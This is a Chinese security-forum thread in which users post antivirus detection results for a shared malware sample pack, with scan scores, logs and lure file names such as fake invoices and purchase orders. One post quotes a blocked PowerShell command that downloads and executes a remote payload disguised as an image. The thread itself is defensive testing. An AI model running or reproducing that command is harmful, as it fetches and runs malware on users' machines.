【开放测试】卡饭病毒样本包 20200716 第87期

显示全部楼层 · 发表于 2020-7-17 07:11:24

Ahnlab V3 Lite
扫描12/16
上传了update.dll

显示全部楼层 · 发表于 2020-7-17 08:13:58

本帖最后由欧阳宣于 2020-7-17 08:34 编辑

BEST win10 x64 2004扫描后剩余5x

22it-34165.jpg 双击并启用宏后提示file not found
290453721

On-Access scanning has detected an execution of a malicious command line.The process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe was blocked because of the execution of a malicious command line -Command IEX (New-Object(''Net.WebClient'')).''DoWnloadsTrInG''(''http://spacemantra.biz/blyat.jpeg'')

复制代码

INV20201607PO0093 触发沙箱上传鉴定为Trojan
Request for quotation Gen:Suspicious.Cloud.2.Gm0@aSvHWE
SALVADO 双击后无法访问但是云拉黑和上传沙箱都没提示

显示全部楼层 · 发表于 2020-7-17 09:22:47

测试环境：WIN10 2004 X64 实机

测试产品：360杀毒

病毒库版本：最新

测试项目：扫描

测试配置：火力全开

结果：扫描（4/16)=25%

360杀毒怎么哑火了？

@狂欢... 你的怎么样？

显示全部楼层 · 发表于 2020-7-17 10:11:29

测试环境：MacOS 10.15.5
测试产品：Norton Security
病毒库版本：测试库 2020/7/17
测试项目：扫描
测试配置：默认
结果：扫描（9/16）+ 执行（0/0）= 总计（9/16）56.25%

显示全部楼层 · 发表于 2020-7-17 10:23:36

本帖最后由 sichuanwenxuan 于 2020-7-17 10:25 编辑

双击其中的应用程序，全杀。剩余2个文件。

显示全部楼层 · 发表于 2020-7-17 10:51:14

本帖最后由狂欢... 于 2020-7-17 11:00 编辑

wjy19800315 发表于 2020-7-17 09:22
测试环境：WIN10 2004 X64 实机
测试产品：360杀毒病毒库版本：最新 ...

是不是你的出问题了。。。我昨晚扫了一下，13个啊。你看18楼极宝杀毒也用的360引擎，也不至于4个啊。。
C:\360极速浏览器下载\7.16 5x\Facturas Pagadas al Vencimiento.exe       木马程序(Generic/HEUR/QVM03.0.9A84.Malware.Gen)       未处理
C:\360极速浏览器下载\7.16 5x\HSBC SWIFT 15072020_39458727759233665_PDF.exe       木马程序(Generic/HEUR/QVM03.0.9A84.Malware.Gen)       未处理
C:\360极速浏览器下载\7.16 5x\INV20201607PO0093.exe       木马程序(Generic/HEUR/QVM03.0.9A84.Malware.Gen)       未处理
C:\360极速浏览器下载\7.16 5x\Nuovo ordine.exe       木马程序(Generic/HEUR/QVM03.0.9A84.Malware.Gen)       未处理
C:\360极速浏览器下载\7.16 5x\PURCHASE ORDER.exe       木马程序(Generic/HEUR/QVM03.0.9A84.Malware.Gen)       未处理
C:\360极速浏览器下载\7.16 5x\Quotation9344.Scan.exe       木马程序(Generic/HEUR/QVM03.0.9A84.Malware.Gen)       未处理
C:\360极速浏览器下载\7.16 5x\Request for quotation.exe       木马程序(Generic/HEUR/QVM03.0.9A84.Malware.Gen)       未处理
C:\360极速浏览器下载\7.16 5x\RFQ 0000000000.exe       木马程序(Generic/HEUR/QVM03.0.9A84.Malware.Gen)       未处理
C:\360极速浏览器下载\7.16 5x\stool.exe       木马程序(Generic/HEUR/QVM03.0.9A84.Malware.Gen)       未处理
C:\360极速浏览器下载\7.16 5x\DHL INVOICE.exe       木马程序(Generic/HEUR/QVM03.0.9A84.Malware.Gen)       未处理
C:\360极速浏览器下载\7.16 5x\DST261234.exe       木马程序(Generic/HEUR/QVM03.0.9A29.Malware.Gen)       未处理
C:\360极速浏览器下载\7.16 5x\setup.exe       QVM10.2.309F.Malware.Gen       未处理
C:\360极速浏览器下载\7.16 5x\290453721.xls       木马程序(Generic/Trojan.Downloader.3f4)       未处理

显示全部楼层 · 发表于 2020-7-17 11:31:50

本帖最后由 wjy19800315 于 2020-7-17 11:36 编辑

狂欢... 发表于 2020-7-17 10:51
是不是你的出问题了。。。我昨晚扫了一下，13个啊。你看18楼极宝杀毒也用的360引擎，也不至于4个啊。。
...

我知道是什么原因了，是我在测试好一次性记录查杀数，我关闭了杀毒的文件监控，只使用右键扫描，结果就4个，可能发生了BUG.@360主动防御，刚刚没有关闭文件监控，查杀13个。然后在试了一下，关闭文件监控，纯右键也是13个，无语！

显示全部楼层 · 发表于 2020-7-17 12:47:10

本帖最后由狂欢... 于 2020-7-17 13:03 编辑

wjy19800315 发表于 2020-7-17 11:31
我知道是什么原因了，是我在测试好一次性记录查杀数，我关闭了杀毒的文件监控，只使用右键扫描，结果就4 ...

我刚把360杀毒的QVM模型套到了卫士上，这样卫士本地查出率就和杀毒一致了，哈哈哈，不过只能断网用，联网好像不参与

显示全部楼层 · 发表于 2020-7-17 13:25:53

WD扫描剩余2个文件。

显示全部楼层 · 发表于 2020-7-17 19:55:14

测试环境：WIN10 家庭版
测试产品：微店佰慧智能防御软件
病毒库版本：1.6.3089.200717
测试项目：扫描
测试配置：标准
结果：扫描（14/16）
日志：

截图（可选）：

[病毒样本] 【开放测试】卡饭病毒样本包 20200716 第87期

本帖子中包含更多资源

本帖子中包含更多资源

评分

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源